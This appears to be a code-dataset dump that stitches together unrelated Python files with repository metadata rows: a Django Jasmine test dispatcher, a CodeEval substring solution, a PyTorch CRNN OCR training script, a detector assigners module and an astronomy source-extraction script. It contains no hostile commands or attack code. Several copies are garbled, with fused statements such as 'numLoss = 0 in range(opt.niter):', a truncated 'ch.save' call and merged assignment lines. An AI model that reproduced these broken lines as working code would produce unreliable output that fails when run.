    classes = inspect.getmembers(sys.modules[tests.__name__],
                                 inspect.isclass)

    if not test_name:
        # No class requested: list every available test class.
        names = (cls_name for cls_name, _ in classes)
        return django.shortcuts.render(
            request,
            "horizon/jasmine/index.html",
            {'classes': names}
        )

    for cls_name, cls in classes:
        if cls_name != test_name:
            continue
        # Fall back to the default runner template when the class
        # does not define one.
        template = cls.template_name or "horizon/jasmine/jasmine.html"
        return django.shortcuts.render(
            request,
            template,
            {'specs': cls.specs, 'sources': cls.sources,
             'externalTemplates': cls.externalTemplates})

    # Unknown test name: behave like any other missing page.
    return django.views.defaults.page_not_found(request)
| 34.352941 | 75 | 0.651256 |
import inspect
import sys
import django.shortcuts
import django.views.defaults
def dispatcher(request, test_name):
from openstack_dashboard.test.jasmine import jasmine_tests as tests
classes = inspect.getmembers(sys.modules[tests.__name__],
inspect.isclass)
if not test_name:
return django.shortcuts.render(
request,
"horizon/jasmine/index.html",
{'classes': (cls_name for cls_name, _ in classes)}
)
else:
for cls_name, cls in classes:
if cls_name == test_name:
template = cls.template_name
if not template:
template = "horizon/jasmine/jasmine.html"
return django.shortcuts.render(
request,
template,
{'specs': cls.specs, 'sources': cls.sources,
'externalTemplates': cls.externalTemplates})
return django.views.defaults.page_not_found(request)
| true | true |
f72305483ba8a7b4f1b3f45c3b34f1b39521c5dd | 478 | py | Python | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 25 | 2015-01-21T16:39:18.000Z | 2021-05-24T07:01:24.000Z | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 2 | 2020-09-30T19:39:36.000Z | 2020-10-01T17:15:16.000Z | codeEval/hard/repeated_substring.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 15 | 2015-01-21T16:39:27.000Z | 2020-10-01T17:00:22.000Z | import sys, re
def get_repeated_substring(s):
    """Return the longest substring of `s` that occurs at least twice without
    overlapping, or "NONE" if there is no such substring.

    Candidate substrings that start with whitespace are skipped. Lengths are
    scanned from len(s)//2 (the longest possible non-overlapping repeat)
    down to 1, so the first match found is a longest one.
    """
    l = len(s)
    # `range` instead of Py2-only `xrange` (works on both), and floor
    # division so the bound stays an int under Python 3.
    for i in range(l // 2, 0, -1):
        for j in range(l - i + 1):
            ss = s[j : j + i]
            # Raw string so the regex escape survives Python 3's
            # invalid-escape deprecation.
            if not re.match(r"\s+", ss):
                # Look for a second occurrence starting at or after j + i,
                # i.e. non-overlapping with the first one.
                for k in range(i + j, l - i + 1):
                    if s[k : k + i] == ss:
                        return ss
    return "NONE"
# Read one test case per line from the file named on the command line and
# print the longest repeated substring for each. The context manager
# guarantees the file is closed even if a line raises.
with open(sys.argv[1], "r") as test_cases:
    for test in test_cases:
        print(get_repeated_substring(test.strip()))
| 23.9 | 50 | 0.481172 | import sys, re
def get_repeated_substring(s):
l = len(s)
for i in xrange(l / 2, 0, -1):
for j in xrange(l - i + 1):
ss = s[j : j + i]
if not re.match("\s+", ss):
for k in xrange(i + j, l - i + 1):
if s[k : k + i] == ss:
return ss
return "NONE"
test_cases = open(sys.argv[1], "r")
for test in test_cases:
print get_repeated_substring(test.strip())
test_cases.close()
| false | true |
f72305c4b33988bbf84766ce64ecc1d5889f907b | 10,006 | py | Python | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | null | null | null | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | null | null | null | train/pytorch-train/crnn_main.py | yyong119/EE208-Teamproject | 4cfecbf83981d89a98e811fcc7eefa9134036c43 | [
"MIT"
] | 5 | 2018-06-25T10:48:56.000Z | 2021-01-12T06:12:38.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from warpctc_pytorch import CTCLoss
import os
import utils
import dataset
from keys import alphabet
#Alphabet = [e.encode('utf-8') for e in alphabet]
import models.crnn as crnn
#with open('../run/char.txt') as f:
# newChars = f.read().strip().decode('utf-8')
#alphabet += u''.join(list(set(newChars) - set(alphabet)))
parser = argparse.ArgumentParser()
parser.add_argument('--trainroot', help='path to dataset',default='../data/lmdb/train')
parser.add_argument('--valroot', help='path to dataset',default='../data/lmdb/val')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batchSize', type=int, default=128, help='input batch size')
parser.add_argument('--imgH', type=int, default=32, help='the height of the input image to network')
parser.add_argument('--imgW', type=int, default=256, help='the width of the input image to network')
parser.add_argument('--nh', type=int, default=256, help='size of the lstm hidden state')
parser.add_argument('--niter', type=int, default=1000000, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.005, help='learning rate for Critic, default=0.00005')
parser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--crnn', help="path to crnn (to continue training)",default='../pretrain-models/netCRNN.pth')
#parser.add_argument('--crnn', help="path to crnn (to continue training)",default='')
parser.add_argument('--alphabet', default=alphabet)
parser.add_argument('--experiment', help='Where to store samples and models',default='./save_model')
parser.add_argument('--displayInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--n_test_disp', type=int, default=1000, help='Number of samples to display when test')
parser.add_argument('--valInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--saveInterval', type=int, default=1000, help='Interval to be displayed')
parser.add_argument('--adam', action='store_true', help='Whether to use adam (default is rmsprop)')
parser.add_argument('--adadelta', action='store_true', help='Whether to use adadelta (default is rmsprop)')
parser.add_argument('--keep_ratio', action='store_true', help='whether to keep ratio for image resize')
parser.add_argument('--random_sample', action='store_true', help='whether to sample the dataset with random sampler')
opt = parser.parse_args()
print(opt)
ifUnicode=True
if opt.experiment is None:
opt.experiment = 'expr'
os.system('mkdir {0}'.format(opt.experiment))
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
train_dataset = dataset.lmdbDataset(root=opt.trainroot)
assert train_dataset
if not opt.random_sample:
sampler = dataset.randomSequentialSampler(train_dataset, opt.batchSize)
else:
sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batchSize,
shuffle=True, sampler=sampler,
num_workers=int(opt.workers),
collate_fn=dataset.alignCollate(imgH=opt.imgH, imgW=opt.imgW, keep_ratio=opt.keep_ratio))
test_dataset = dataset.lmdbDataset(
root=opt.valroot, transform=dataset.resizeNormalize((256, 32)))
ngpu = int(opt.ngpu)
nh = int(opt.nh)
alphabet = opt.alphabet
nclass = len(alphabet) + 1
nc = 1
converter = utils.strLabelConverter(alphabet)
criterion = CTCLoss()
# custom weights initialization called on crnn
def weights_init(m):
    """Custom layer initialization, applied to every module via crnn.apply().

    Convolution layers get weights ~ N(0, 0.02); batch-norm layers get
    weights ~ N(1.0, 0.02) and zeroed biases. All other layers are left
    untouched.
    """
    layer_type = m.__class__.__name__
    if 'Conv' in layer_type:
        m.weight.data.normal_(0.0, 0.02)
    elif 'BatchNorm' in layer_type:
        m.weight.data.normal_(1.0, 0.02)
        m.bias.data.fill_(0)
# Build the CRNN model. NOTE(review): this rebinds the imported module name
# `crnn` (models.crnn) to the model instance; the module is not used again.
crnn = crnn.CRNN(opt.imgH, nc, nclass, nh, ngpu)
crnn.apply(weights_init)
if opt.crnn != '':
    # Warm-start from a pretrained checkpoint when one is supplied.
    print('loading pretrained model from %s' % opt.crnn)
    crnn.load_state_dict(torch.load(opt.crnn))
print(crnn)
# Reusable input buffers, refilled each batch by utils.loadData().
# NOTE(review): allocated with 3 channels and imgH for both dims even though
# nc == 1 and imgW differs — loadData presumably resizes; confirm.
image = torch.FloatTensor(opt.batchSize, 3, opt.imgH, opt.imgH)
text = torch.IntTensor(opt.batchSize * 5)
length = torch.IntTensor(opt.batchSize)
if opt.cuda:
    crnn.cuda()
    image = image.cuda()
    criterion = criterion.cuda()
# Wrap buffers as autograd Variables (legacy pre-0.4 PyTorch API).
image = Variable(image)
text = Variable(text)
length = Variable(length)
# loss averager (running mean of the training CTC cost)
loss_avg = utils.averager()
# setup optimizer: Adam / Adadelta / RMSprop (default) per CLI flags
if opt.adam:
    optimizer = optim.Adam(crnn.parameters(), lr=opt.lr,
                           betas=(opt.beta1, 0.999))
elif opt.adadelta:
    optimizer = optim.Adadelta(crnn.parameters(), lr=opt.lr)
else:
    optimizer = optim.RMSprop(crnn.parameters(), lr=opt.lr)
def val(net, dataset, criterion, max_iter=2):
    """Run a short validation pass and return (test_loss, accuracy).

    Evaluates at most `max_iter` batches of `dataset`. Accuracy is the
    fraction of predictions that exactly match the target transcription.
    NOTE(review): gradients are frozen on the global `crnn` (not on `net`),
    and the global `image`/`text`/`length` buffers are reused — this
    assumes `net` is the same object as `crnn`; confirm at call sites.
    """
    print('Start val')
    for p in crnn.parameters():
        p.requires_grad = False
    net.eval()
    data_loader = torch.utils.data.DataLoader(
        dataset, shuffle=True, batch_size=opt.batchSize, num_workers=int(opt.workers))
    val_iter = iter(data_loader)
    i = 0
    n_correct = 0
    # Local averager; shadows the module-level `loss_avg` on purpose.
    loss_avg = utils.averager()
    max_iter = min(max_iter, len(data_loader))
    for i in range(max_iter):
        data = val_iter.next()  # Python 2 iterator protocol
        i += 1  # NOTE(review): no effect — `i` is rebound by the for loop
        cpu_images, cpu_texts = data
        batch_size = cpu_images.size(0)
        utils.loadData(image, cpu_images)
        if ifUnicode:
            # Decode utf-8 bytes and drop characters outside the alphabet.
            cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
        t, l = converter.encode(cpu_texts)
        utils.loadData(text, t)
        utils.loadData(length, l)
        preds = crnn(image)
        preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
        cost = criterion(preds, text, preds_size, length) / batch_size
        loss_avg.add(cost)
        # Greedy (best-path) CTC decoding of the network output.
        _, preds = preds.max(2)
        preds = preds.squeeze(2)
        preds = preds.transpose(1, 0).contiguous().view(-1)
        sim_preds = converter.decode(preds.data, preds_size.data, raw=False)
        for pred, target in zip(sim_preds, cpu_texts):
            if pred.strip() == target.strip():
                n_correct += 1
    # Raw (undecoded) predictions of the last batch; kept for debugging only.
    raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:opt.n_test_disp]
    #for raw_pred, pred, gt in zip(raw_preds, sim_preds, cpu_texts):
        #print((pred, gt))
    #print
    accuracy = n_correct / float(max_iter * opt.batchSize)
    testLoss = loss_avg.val()
    #print('Test loss: %f, accuray: %f' % (testLoss, accuracy))
    return testLoss,accuracy
def clean_txt(txt, charset=None):
    """Replace every character of `txt` that is not in `charset` with a space.

    Args:
        txt: unicode string to sanitise.
        charset: container of allowed characters; defaults to the
            module-level `alphabet` used by the label converter.

    Returns:
        A unicode string of the same length as `txt`.
    """
    allowed = alphabet if charset is None else charset
    return u''.join(c if c in allowed else u' ' for c in txt)
def trainBatch(net, criterion, optimizer,flage=False):
    """Run one optimisation step on the next training batch; return the CTC cost.

    NOTE(review): operates on the module globals `crnn`, `train_iter` and
    the `image`/`text`/`length` buffers — the `net` parameter is unused.
    When `flage` is True the step is taken with a freshly created
    Adadelta(lr=1e-4) instead of the passed-in optimizer, discarding any
    accumulated optimizer state; presumably intended as a learning-rate
    drop — confirm before relying on it.
    """
    data = train_iter.next()  # Python 2 iterator protocol
    cpu_images, cpu_texts = data  # labels arrive as utf-8 bytes
    if ifUnicode:
        # Decode to unicode and drop characters outside the alphabet.
        cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
    batch_size = cpu_images.size(0)
    utils.loadData(image, cpu_images)
    t, l = converter.encode(cpu_texts)
    utils.loadData(text, t)
    utils.loadData(length, l)
    preds = crnn(image)
    preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
    # CTC loss averaged over the batch.
    cost = criterion(preds, text, preds_size, length) / batch_size
    crnn.zero_grad()
    cost.backward()
    if flage:
        lr = 0.0001
        optimizer = optim.Adadelta(crnn.parameters(), lr=lr)
    optimizer.step()
    return cost
num =0
lasttestLoss = 10000
testLoss = 10000
import os
def delete(path):
    """Remove every saved model checkpoint (*.pth) in directory `path`.

    Used to purge stale checkpoints before saving a better one.
    """
    # Local imports kept to match the original style of this script.
    import os
    import glob
    # os.path.join instead of string concatenation keeps this portable.
    for p in glob.glob(os.path.join(path, '*.pth')):
        os.remove(p)
# --- Main training loop ---
numLoss = 0  # consecutive validations without a test-loss improvement
for epoch in range(opt.niter):
    train_iter = iter(train_loader)
    i = 0
    while i < len(train_loader):
        #print('The step{} ........\n'.format(i))
        # Re-enable gradients (val() turned them off) and switch to train mode.
        for p in crnn.parameters():
            p.requires_grad = True
        crnn.train()
        #if numLoss>50:
        #    cost = trainBatch(crnn, criterion, optimizer,True)
        #    numLoss = 0
        #else:
        cost = trainBatch(crnn, criterion, optimizer)
        loss_avg.add(cost)
        i += 1
        #if i % opt.displayInterval == 0:
        #    print('[%d/%d][%d/%d] Loss: %f' %
        #          (epoch, opt.niter, i, len(train_loader), loss_avg.val()))
        #    loss_avg.reset()
        # Periodic validation and (conditional) checkpointing.
        if i % opt.valInterval == 0:
            testLoss,accuracy = val(crnn, test_dataset, criterion)
            #print('Test loss: %f, accuray: %f' % (testLoss, accuracy))
            print("epoch:{},step:{},Test loss:{},accuracy:{},train loss:{}".format(epoch,num,testLoss,accuracy,loss_avg.val()))
            loss_avg.reset()
            # do checkpointing: save only when the validation loss improved
            num +=1
            #lasttestLoss = min(lasttestLoss,testLoss)
            if lasttestLoss >testLoss:
                print("The step {},last lost:{}, current: {},save model!".format(num,lasttestLoss,testLoss))
                lasttestLoss = testLoss
                #delete(opt.experiment)  # purge old checkpoints (disabled)
                torch.save(crnn.state_dict(), '{}/netCRNN.pth'.format(opt.experiment))
                numLoss = 0
            else:
                numLoss+=1
from __future__ import print_function
import argparse
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from warpctc_pytorch import CTCLoss
import os
import utils
import dataset
from keys import alphabet
import models.crnn as crnn
parser = argparse.ArgumentParser()
parser.add_argument('--trainroot', help='path to dataset',default='../data/lmdb/train')
parser.add_argument('--valroot', help='path to dataset',default='../data/lmdb/val')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batchSize', type=int, default=128, help='input batch size')
parser.add_argument('--imgH', type=int, default=32, help='the height of the input image to network')
parser.add_argument('--imgW', type=int, default=256, help='the width of the input image to network')
parser.add_argument('--nh', type=int, default=256, help='size of the lstm hidden state')
parser.add_argument('--niter', type=int, default=1000000, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.005, help='learning rate for Critic, default=0.00005')
parser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--crnn', help="path to crnn (to continue training)",default='../pretrain-models/netCRNN.pth')
parser.add_argument('--alphabet', default=alphabet)
parser.add_argument('--experiment', help='Where to store samples and models',default='./save_model')
parser.add_argument('--displayInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--n_test_disp', type=int, default=1000, help='Number of samples to display when test')
parser.add_argument('--valInterval', type=int, default=50, help='Interval to be displayed')
parser.add_argument('--saveInterval', type=int, default=1000, help='Interval to be displayed')
parser.add_argument('--adam', action='store_true', help='Whether to use adam (default is rmsprop)')
parser.add_argument('--adadelta', action='store_true', help='Whether to use adadelta (default is rmsprop)')
parser.add_argument('--keep_ratio', action='store_true', help='whether to keep ratio for image resize')
parser.add_argument('--random_sample', action='store_true', help='whether to sample the dataset with random sampler')
opt = parser.parse_args()
print(opt)
ifUnicode=True
if opt.experiment is None:
opt.experiment = 'expr'
os.system('mkdir {0}'.format(opt.experiment))
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
train_dataset = dataset.lmdbDataset(root=opt.trainroot)
assert train_dataset
if not opt.random_sample:
sampler = dataset.randomSequentialSampler(train_dataset, opt.batchSize)
else:
sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batchSize,
shuffle=True, sampler=sampler,
num_workers=int(opt.workers),
collate_fn=dataset.alignCollate(imgH=opt.imgH, imgW=opt.imgW, keep_ratio=opt.keep_ratio))
test_dataset = dataset.lmdbDataset(
root=opt.valroot, transform=dataset.resizeNormalize((256, 32)))
ngpu = int(opt.ngpu)
nh = int(opt.nh)
alphabet = opt.alphabet
nclass = len(alphabet) + 1
nc = 1
converter = utils.strLabelConverter(alphabet)
criterion = CTCLoss()
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
crnn = crnn.CRNN(opt.imgH, nc, nclass, nh, ngpu)
crnn.apply(weights_init)
if opt.crnn != '':
print('loading pretrained model from %s' % opt.crnn)
crnn.load_state_dict(torch.load(opt.crnn))
print(crnn)
image = torch.FloatTensor(opt.batchSize, 3, opt.imgH, opt.imgH)
text = torch.IntTensor(opt.batchSize * 5)
length = torch.IntTensor(opt.batchSize)
if opt.cuda:
crnn.cuda()
image = image.cuda()
criterion = criterion.cuda()
image = Variable(image)
text = Variable(text)
length = Variable(length)
loss_avg = utils.averager()
if opt.adam:
optimizer = optim.Adam(crnn.parameters(), lr=opt.lr,
betas=(opt.beta1, 0.999))
elif opt.adadelta:
optimizer = optim.Adadelta(crnn.parameters(), lr=opt.lr)
else:
optimizer = optim.RMSprop(crnn.parameters(), lr=opt.lr)
def val(net, dataset, criterion, max_iter=2):
print('Start val')
for p in crnn.parameters():
p.requires_grad = False
net.eval()
data_loader = torch.utils.data.DataLoader(
dataset, shuffle=True, batch_size=opt.batchSize, num_workers=int(opt.workers))
val_iter = iter(data_loader)
i = 0
n_correct = 0
loss_avg = utils.averager()
max_iter = min(max_iter, len(data_loader))
for i in range(max_iter):
data = val_iter.next()
i += 1
cpu_images, cpu_texts = data
batch_size = cpu_images.size(0)
utils.loadData(image, cpu_images)
if ifUnicode:
cpu_texts = [ clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
t, l = converter.encode(cpu_texts)
utils.loadData(text, t)
utils.loadData(length, l)
preds = crnn(image)
preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
cost = criterion(preds, text, preds_size, length) / batch_size
loss_avg.add(cost)
_, preds = preds.max(2)
preds = preds.squeeze(2)
preds = preds.transpose(1, 0).contiguous().view(-1)
sim_preds = converter.decode(preds.data, preds_size.data, raw=False)
for pred, target in zip(sim_preds, cpu_texts):
if pred.strip() == target.strip():
n_correct += 1
raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:opt.n_test_disp]
accuracy = n_correct / float(max_iter * opt.batchSize)
testLoss = loss_avg.val()
return testLoss,accuracy
def clean_txt(txt):
newTxt = u''
for t in txt:
if t in alphabet:
newTxt+=t
else:
newTxt+=u' '
return newTxt
def trainBatch(net, criterion, optimizer, flage=False):
    """Run one optimisation step on the next training batch and return the
    per-sample CTC cost.

    NOTE(review): *net* is unused — the forward pass runs on the module-level
    ``crnn`` (same object in practice). When *flage* is True a fresh Adadelta
    optimizer with lr=0.0001 is created locally and used for this step only.
    """
    data = next(train_iter)
    # Fix: the original dump fused the next two statements onto one line.
    cpu_images, cpu_texts = data
    cpu_texts = [clean_txt(tx.decode('utf-8')) for tx in cpu_texts]
    batch_size = cpu_images.size(0)
    utils.loadData(image, cpu_images)
    t, l = converter.encode(cpu_texts)
    utils.loadData(text, t)
    utils.loadData(length, l)
    preds = crnn(image)
    preds_size = Variable(torch.IntTensor([preds.size(0)] * batch_size))
    cost = criterion(preds, text, preds_size, length) / batch_size
    crnn.zero_grad()
    cost.backward()
    if flage:
        lr = 0.0001
        optimizer = optim.Adadelta(crnn.parameters(), lr=lr)
    optimizer.step()
    return cost
# Training bookkeeping: number of completed validation steps and the best
# (lowest) validation loss seen so far, used to decide when to checkpoint.
num =0
lasttestLoss = 10000
testLoss = 10000
import os
def delete(path):
    """Remove every ``.pth`` checkpoint file directly under *path*.

    Non-checkpoint files and subdirectories are left untouched.
    """
    import os
    import glob
    paths = glob.glob(path + '/*.pth')
    for p in paths:
        os.remove(p)
# ---------------------------------------------------------------------------
# Main training loop. The original line "numLoss = 0 in range(opt.niter):"
# was a corrupted merge of the two statements that open this section.
# ---------------------------------------------------------------------------
numLoss = 0
for epoch in range(opt.niter):
    train_iter = iter(train_loader)
    i = 0
    while i < len(train_loader):
        # Re-enable gradients (val() freezes the parameters).
        for p in crnn.parameters():
            p.requires_grad = True
        crnn.train()
        cost = trainBatch(crnn, criterion, optimizer)
        loss_avg.add(cost)
        i += 1
        if i % opt.valInterval == 0:
            testLoss, accuracy = val(crnn, test_dataset, criterion)
            print("epoch:{},step:{},Test loss:{},accuracy:{},train loss:{}".format(epoch, num, testLoss, accuracy, loss_avg.val()))
            loss_avg.reset()
            num += 1
            # Checkpoint only when the validation loss improves.
            if lasttestLoss > testLoss:
                print("The step {},last lost:{}, current: {},save model!".format(num, lasttestLoss, testLoss))
                lasttestLoss = testLoss
                # Fix: "ch.save" was a typo for torch.save.
                torch.save(crnn.state_dict(), '{}/netCRNN.pth'.format(opt.experiment))
                numLoss = 0
            else:
                numLoss += 1
| true | true |
f72306b88c537cc8bdfae44f211f93ef1cbe9d3a | 475 | py | Python | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 549 | 2020-01-02T05:14:57.000Z | 2022-03-29T18:34:12.000Z | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 98 | 2020-01-21T09:41:30.000Z | 2022-03-12T00:53:06.000Z | vedadet/misc/bbox/assigners/__init__.py | jie311/vedadet | aaf3b3bc3c7944aba1cc28138165d403023a9152 | [
"Apache-2.0"
] | 233 | 2020-01-18T03:46:27.000Z | 2022-03-19T03:17:47.000Z | from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
from .atss_assigner import ATSSAssigner
from .base_assigner import BaseAssigner
from .center_region_assigner import CenterRegionAssigner
from .max_iou_assigner import MaxIoUAssigner
from .point_assigner import PointAssigner
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'PointAssigner', 'ATSSAssigner', 'CenterRegionAssigner'
]
| 36.538462 | 77 | 0.835789 | from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
from .atss_assigner import ATSSAssigner
from .base_assigner import BaseAssigner
from .center_region_assigner import CenterRegionAssigner
from .max_iou_assigner import MaxIoUAssigner
from .point_assigner import PointAssigner
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'PointAssigner', 'ATSSAssigner', 'CenterRegionAssigner'
]
| true | true |
f72307576e0edce787b49d3a64c9a3b339e49912 | 4,644 | py | Python | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on 28/10/2017
@author: Carlos Eduardo Barbosa
Detection of sources in data and separation of bins prior to Voronoi
tesselation
"""
from __future__ import division, print_function
import os
import pyregion
import numpy as np
from astropy.io import fits
from astropy.convolution import Gaussian2DKernel, convolve
from astropy.table import Table
import matplotlib.pyplot as plt
from astropy.stats import SigmaClip
from photutils.background import Background2D, MedianBackground
import sewpy
import context
from misc import array_from_header
def background_removed_data(imgname, redo=False, output=None, hdunum=1):
    """Subtract a 2D median background from one extension of *imgname*.

    Parameters
    ----------
    imgname : str
        Input FITS file.
    redo : bool
        Recompute even if the output file already exists.
    output : str or None
        Output FITS file name; defaults to "detection.fits".
    hdunum : int
        FITS extension to read the data from.

    Returns the output file name.
    """
    if output is None:
        # Bug fix: the output argument used to be unconditionally overwritten.
        output = "detection.fits"
    # Reuse a cached result unless a redo is requested (also avoids reading
    # the input at all in that case).
    if os.path.exists(output) and not redo:
        return output
    # Bug fix: honour hdunum instead of the hard-coded ext=1.
    data = fits.getdata(imgname, ext=hdunum)
    sigma_clip = SigmaClip(sigma=3.)
    bkg_estimator = MedianBackground()
    bkg = Background2D(data, (8, 8), filter_size=(5, 5),
                       sigma_clip=sigma_clip, bkg_estimator=bkg_estimator)
    outdata = data - bkg.background
    fits.writeto(output, outdata, overwrite=True)
    return output
def mask_from_regions(imgname, redo=False):
    """Mask (set to NaN) the regions marked in the ds9 file "mask.reg" and
    write the result to "detection_masked.fits".

    Returns the masked file name. Bug fix: the cached branch used to return
    the mask *data* while the fresh branch returned the *file name*; callers
    (e.g. run_ngc3311) pass the result on as a file name, so always return
    the path.
    """
    filename = "mask.reg"
    outfile = "detection_masked.fits"
    if os.path.exists(outfile) and not redo:
        return outfile
    data = fits.getdata(imgname)
    r = pyregion.open(filename)
    for region in r.get_filter():
        mask = region.mask(data.shape)
        data[mask] = np.nan
    hdu = fits.PrimaryHDU(data)
    hdu.writeto(outfile, overwrite=True)
    return outfile
def run_sextractor(img, redo=False, outfile=None):
    """ Produces a catalogue of sources in a given field. """
    if outfile is None:
        outfile = "source-catalog.fits"
    # Reuse an existing catalogue unless a redo is requested.
    if os.path.exists(outfile) and not redo:
        return outfile
    # Columns written to the output catalogue.
    output_params = ["NUMBER", "X_IMAGE", "Y_IMAGE", "KRON_RADIUS",
                     "ELLIPTICITY", "THETA_IMAGE", "A_IMAGE", "B_IMAGE",
                     "MAG_AUTO", "FLUX_RADIUS"]
    sex_config = {"CHECKIMAGE_TYPE": "BACKGROUND",
                  "CHECKIMAGE_NAME": "background.fits",
                  "DETECT_THRESH": 1.5}
    extractor = sewpy.SEW(config=sex_config, sexpath="source-extractor",
                          params=output_params)
    result = extractor(img)
    result["table"].write(outfile, format="fits", overwrite=True)
    return outfile
def mask_sources(img, cat, ignore=None, redo=False, output=None):
    """ Produces segmentation image with bins for detected sources using
    elliptical regions. """
    if output is None:
        output = "sources_mask.fits"
    if os.path.exists(output) and not redo:
        return output
    data = fits.getdata(img)
    ydim, xdim = data.shape
    # 1-based pixel grid matching SExtractor's image coordinate convention.
    xx, yy = np.meshgrid(np.arange(1, xdim + 1), np.arange(1, ydim + 1))
    table = Table.read(cat, 1)
    if ignore is not None:
        # Drop sources whose catalogue NUMBER appears in the ignore list.
        idx = np.array([i for i,x in enumerate(table["NUMBER"]) if x not in
                        ignore])
        table = table[idx]
    # NOTE(review): axratio is computed but unused — the filter below is
    # commented out.
    axratio = table["B_IMAGE"] / table["A_IMAGE"]
    # table = table[axratio > 0.4]
    mask = np.zeros_like(data)
    for source in table:
        # Elliptical radius around each source. PA is passed as
        # THETA_IMAGE - 90 — presumably an angle-convention conversion;
        # verify against calc_isophotes' convention.
        R = calc_isophotes(xx, yy, source["X_IMAGE"], source["Y_IMAGE"], \
                           source["THETA_IMAGE"] - 90, source["B_IMAGE"] /
                           source["A_IMAGE"])
        # Mask out to 1.5 Kron radii.
        Rmax = 1.5 * source["KRON_RADIUS"]
        mask += np.where(R <= Rmax, 1, 0)
    hdu = fits.PrimaryHDU(mask)
    hdu.writeto(output, overwrite=True)
    return output
def calc_isophotes(x, y, x0, y0, PA, q):
    """ Calculate isophotes for a given component. """
    # Shift coordinates to the component centre.
    dx = np.copy(x) - x0
    dy = np.copy(y) - y0
    original_shape = dx.shape
    # Rotate the flattened coordinate grid by the position angle PA (deg).
    angle = np.radians(PA)
    cosang, sinang = np.cos(angle), np.sin(angle)
    rotation = np.array([[sinang, cosang], [-cosang, sinang]])
    coords = np.column_stack((dx.flatten(), dy.flatten()))
    xrot, yrot = coords.dot(rotation).T
    xrot = xrot.reshape(original_shape)
    yrot = yrot.reshape(original_shape)
    # Elliptical radius: the second axis is scaled by the axial ratio q.
    return np.sqrt(xrot ** 2 + (yrot / q) ** 2)
def run_ngc3311(redo=False):
    """Run the full detection pipeline on every NGC 3311 field."""
    data_dir = os.path.join(context.home_dir, "data")
    for field in context.fields:
        os.chdir(os.path.join(data_dir, field))
        # Field A uses the ellipse-model image; the other fields use their
        # per-field S/N images.
        if field == "fieldA":
            imgname = "ellipse_model.fits"
        else:
            imgname = f"sn_field{field[-1]}.fits"
        detection_img = background_removed_data(imgname, redo=redo)
        masked_img = mask_from_regions(detection_img, redo=redo)
        catalog = run_sextractor(masked_img, redo=redo)
